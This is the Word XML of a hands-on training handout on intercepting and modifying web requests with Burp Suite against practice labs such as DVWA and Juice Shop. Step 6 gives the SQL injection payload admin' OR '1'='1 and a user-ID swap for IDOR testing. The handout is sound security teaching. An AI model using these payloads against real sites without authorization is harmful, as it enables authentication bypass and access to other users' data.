    <w:p w14:paraId="1177FAE3" w14:textId="77777777" w:rsidR="004146C8" w:rsidRDefault="004146C8"/>
    <w:p w14:paraId="3F4A70E5" w14:textId="2C311576" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hands-on Exercise: Web Application Testing with Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D9DDBB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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C0EEC" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Learn how to intercept, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>, and modify web requests to identify vulnerabilities in a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79755237" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> Perform these exercises only on </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authorized practice labs</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> such as OWASP Juice Shop or DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E00A0F" w14:textId="543E2AE2" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="41EEA183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1: Install and Launch Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB7040A" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Download Burp Suite Community Edition from the official site of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A22F196" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Install the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099AEE5F" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Launch Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B7750D" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>When the startup window appears:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74123296" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Temporary Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B8D8A" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1DA73" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Burp Defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186363B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB6813" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>You will see the Burp Suite dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30347772" w14:textId="700013F0" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="67D72262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2: Configure Browser Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EFEDD" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Burp Suite works by acting as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy between the browser and the web server</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48944864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Default Proxy Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9F193" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:lastRenderedPageBreak/>
        <w:t>Burp Proxy runs on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A59F05" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D25E28" w14:textId="4E09D759" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="6672E81D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Configure Proxy in Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F9A97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Option A: Use Burp Browser (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A8EEF" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Open Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA5F3B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy → Intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5456AA" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D97E4" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>This browser is automatically configured to use Burp proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08E164" w14:textId="6A97403B" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="6BBB91D1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Option B: Configure Chrome/Firefox Manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5ECA0" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Set proxy settings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3669A" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>HTTP Proxy: 127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E40FCB" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Now all browser traffic passes through Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E9D2A" w14:textId="4787FB8A" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="35201380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3: Enable HTTP Request Interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98D4AB" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Go to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44235C51" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Proxy → Intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99721C" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>Click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB581D" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Intercept is ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7630365C" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve">Now Burp Suite will </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>capture every request before it reaches the server</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A261DB" w14:textId="46C9AA62" w:rsidR="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="58DC8DBF" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="1A90E0E8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4: Visit Target Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310EFA9" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Open the practice lab application, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6F5E4" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>http://localhost/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD42151" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EF312" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>http://localhost:3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738FE0CA" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>When the browser sends a request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF8AC2" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Burp Suite will capture it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B2B89" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:lastRenderedPageBreak/>
        <w:t>Example intercepted request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087218BD" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>Host: targetsite.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2BC8C7" w14:textId="2036B467" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="56C24405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 xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Intercepted HTTP Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B869D3" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Inside Burp Suite you will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103"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB299C" w:rsidRPr="00AB299C" w14:paraId="59058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0C714" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB29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A214D3" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB299C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB299C" w:rsidRPr="00AB299C" w14:paraId="75EF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7361" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>Request Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EFE1EC2" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>GET / POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB299C" w:rsidRPr="00AB299C" w14:paraId="42AC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E529" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E7F3F52" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>Requested page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB299C" w:rsidRPr="00AB299C" w14:paraId="7DDA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BC9E" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="402F9E57" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>Browser &amp; session info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB299C" w:rsidRPr="00AB299C" w14:paraId="2400A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756D" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C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4ADA0DA" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>User inputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB299C" w:rsidRPr="00AB299C" w14:paraId="076F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BB8E" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DB8039D" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
            <w:r w:rsidRPr="00AB299C">
              <w:t>Session tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58C43027" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978230E" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>username=admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB299C">
        <w:br/>
        <w:t>password=1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5B697" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>These parameters can be tested for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A84EA" w14:textId="6DB388FD" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C"/>
    <w:p w14:paraId="5DE9D87A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6: Modify Request Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22A77E" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Edit the parameters directly inside Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F80918C" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C7C9B" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Original request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51250A7E" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>=1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151068DB" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Modify to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31934E4F" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>username=admin' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3001BD" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>Or change user ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFB614" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>=101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B91860" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8DF22" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB299C">
        <w:t>=102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC50766" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:r w:rsidRPr="00AB299C">
        <w:t>This tests for vulnerabilities such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9AB0D" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E3C0C7" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:lastRenderedPageBreak/>
        <w:t>Authentication bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79676ED4" w14:textId="77777777" w:rsidR="00AB299C" w:rsidRPr="00AB299C" w:rsidRDefault="00AB299C" w:rsidP="00AB299C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB299C">
        <w:t>IDOR</w:t>
      </w:r>
    </w:p>
